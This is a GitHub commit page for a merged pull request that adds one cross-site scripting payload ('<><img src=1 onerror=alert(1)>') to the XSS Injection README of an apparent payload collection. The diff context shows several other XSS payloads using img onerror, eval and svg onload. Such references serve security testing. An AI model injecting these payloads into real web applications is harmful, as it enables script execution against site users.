Skip to content

Commit

Permalink
Merge pull request #693 from bountyhacking/patch-1
Browse files Browse the repository at this point in the history
Update README.md
  • Loading branch information
swisskyrepo authored Nov 12, 2023
2 parents 711b44c + 49bc19e commit 3ba4059
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions XSS Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -250,6 +250,7 @@ Most tools are also suitable for blind XSS attacks:
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<><img src=1 onerror=alert(1)>

// Svg payload
<svg onload=alert(1)>
Expand Down

0 comments on commit 3ba4059

Please sign in to comment.